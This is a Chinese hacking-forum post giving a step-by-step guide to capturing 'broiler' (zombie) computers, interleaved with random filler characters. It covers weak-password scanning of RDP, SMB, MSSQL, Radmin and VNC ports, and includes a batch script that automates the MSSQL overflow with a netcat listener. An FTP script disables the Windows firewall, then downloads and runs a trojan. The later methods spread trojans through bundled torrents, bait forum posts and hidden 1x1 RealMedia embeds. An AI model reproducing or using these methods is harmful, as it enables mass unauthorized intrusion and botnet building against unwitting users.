★我要吧★

 找回密码
 注册[Register]
帖子
qq空间相册密码查看为什么登陆后需要激活无法注册?

[分享] QQ黑客最快最有效的13种抓鸡方法

[复制链接]
发表于 2016-11-18 14:45:07 | 显示全部楼层 |阅读模式
最快最有效的12种抓鸡方法
  N" C7 a2 k7 y+ d" l  (1)扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)
( X0 w- J& _9 [. z7 z% j$ N2 ?  现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。
5 E! I9 n; b+ `  (2)扫135端口抓肉鸡
% R- q/ p" E: K! I. m  首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)
# ]. B$ F% D, t/ I1 v8 l+ C9 G6 }  (3)扫445端口抓肉鸡
# A# \1 |1 Y* }; S$ _9 K5 q1 J% M  和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)
* a. x3 C+ E6 _& ~; j  (4)1433端口批量溢出抓肉鸡1 u/ t' H/ ]' o% h; L4 u+ _0 y
  这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。
7 ?* y. [8 S3 S) t  要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件
& s! S) l) h- G  N6 r  首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件
7 Q7 w, b3 O4 i" b2 c( b6 w5 a, [6 b  @echo off$ d- T, K& a1 L
  for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
& x0 ^, D" S% Z. }4 j% i0 v  @echo off1 e. [; X9 b& q) Y4 Q; x
  for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556  ]( f5 t+ n3 h$ O. F2 z
  还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
: N5 ?0 p+ n" r: V- m, q( O  1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口
) u8 Q- b# [. b' @: n/ T  然后再写个批处理; n( D: w: Q$ `6 p
  @echo off
7 R6 @1 t3 k; O+ E/ p" l' l6 ~. X  Nc -l -vv -p 556
9 i; ?6 O. ?9 }: o/ b; \  然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码。
/ \2 z: R8 L8 \2 p8 }  这里给出一种代码+ U& z# Z0 p+ c8 f  z2 Z8 Q
  echo open X.X.X.X(你FTP的IP)>>daima.txt7 \  E* T! e  u9 l' }
  echo username>>daima.txt
/ h; M) Y7 P- t  echo password>>daima.txt
  n& B% e5 Q3 g6 w  echo bin>>daima.txt(以2进制传输数据)/ P8 e/ a. ]  A: t2 D8 G5 l1 X/ f" x
  echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
6 T9 A, h& `7 }6 G  echo bye>>daima.txt
2 n* r8 V; V# `5 k) k  r; A2 C  net stop sharedaccess(关闭WINDOWS自带防火墙)
6 D* B* A: T6 {  u9 _  ftp -s:daima.txt
  U4 ]6 D. D1 h& |  xxx.exe(也是填你木马的文件名)
" y! m2 o# K: z1 M( B: H: G8 }& F  del daima.txt
3 V. [/ P$ N4 U9 W) E  注意上面的代码回车符别删掉,要不然就没法下你的马了。
; A; o- K! ]* p0 }
, p" B* t/ R+ C" K  上面的步骤都搞好后,就可以开始扫肉鸡了。# \( ?8 d; J+ ^2 m, N/ h/ @/ @* k
  先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。
$ F7 i. Z+ U6 N" p  忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。
( t5 T$ }, ]9 G; Y( q+ V0 ?  先休息一下,打这么多字累死了
% ^0 c- U; k( T) m% c# n( |, Y- c; F4 R  继续
0 @( S5 U" z3 {% F) Q  (5)扫1433抓肉鸡之方法2
  \( e, ^5 T" N4 R' N3 P  要用到的工具:端口扫描器 X-scan SQL综合利用工具8 X7 h2 Q4 H  q
  上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。
5 j4 d" v# U( r5 `6 ^/ [  开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。
+ l! B' G% A2 X+ l/ B  首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。
- W. R: Z8 n: ?- w$ P3 z# r7 B7 N (6)用WINNTAutoAttack扫SA弱口令抓肉鸡
' v4 r( U. n) ?. P9 j5 j9 a, Z! D6 p  其实这个原理和上面一样,效率也没上面的高,只是想让大家知道下,呵呵。0 J, N6 N# }3 X5 x$ s
  工具:WINNTAutoAttack SQL综合利用工具
# O. I4 F: I8 b3 s& }# n: z  打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。, X' N6 N2 v# f- {( b0 m! Q( w
  (7)扫4899空口令抓肉鸡
0 M/ e! |3 ]% [$ m/ \  工具:端口扫描器 4899探测器 Radmin6 Z, y- H6 C% N% s4 U% L; C
  首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899
2 p& l; [+ F7 N7 q' \! H  (8)扫5900端口抓VNC肉鸡
: ?6 a" C* t" i, ~& q. T  工具:VNC扫描器 VNC连接器% F3 {- L- K- ~1 n0 o, Y; o% h
  首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv" u/ C. J9 g: O
  扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC% W6 H3 d/ n6 x$ C' r  G( |# U
  接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。
% T  e, o( a; C) h1 }" D% i2 [  (9)BT挂马6 S, {: a- h' U; T" F1 K+ n, U
  顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候 当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。, T) W$ s& [/ s+ Y# t
  (10)免费空间挂马1 Q# L3 ]: H; U& G2 ~
  其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的,很容易吧?7 z7 H3 ]. p" ]- o
  (11)用RM在论坛挂马
0 r1 B9 U$ X& j- h. p7 Z  首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性 ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了 好像FLASH木马也可以这样的,我没试过,大家可以去研究下。( R. ~8 O% g) z5 L
  (12)入侵网站挂马/ l& ~' P& T$ h6 Y3 J3 v0 ?
  这个我也不会,准备学习,在这里也提一下吧。比如你要入入侵一个网站,首先得用工具扫一下漏洞,然后凭借这些漏洞上传你做好的ASP网马,然后运行你的ASP网马,你就可以对这个网站的网页进行一系列修改,比如在他主页插入你的木马地址,这样别人在浏览这个网站的主页时就会中你的马了。中间过程也挺复杂了,我也只了解一点点,如果说错了还请各位批评指正。- b% {# e4 Z+ F4 }8 f

" }3 \' I3 w7 y

评分

参与人数 1好评度 +5 收起 理由
灬无名灬 + 5 新会员转正奖励,转正后,勿灌水,以防封号.

查看全部评分

发表于 2022-2-8 17:23:07 来自手机 | 显示全部楼层
感谢楼主分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

QQ|手机版|小黑屋|☆我要吧☆ ( 豫ICP备13016831号-1 )

GMT+8, 2025-4-25 21:39 , Processed in 0.088841 second(s), 22 queries .

Powered by abc369 X3.4

© 2001-2023 abc369.

快速回复 返回顶部 返回列表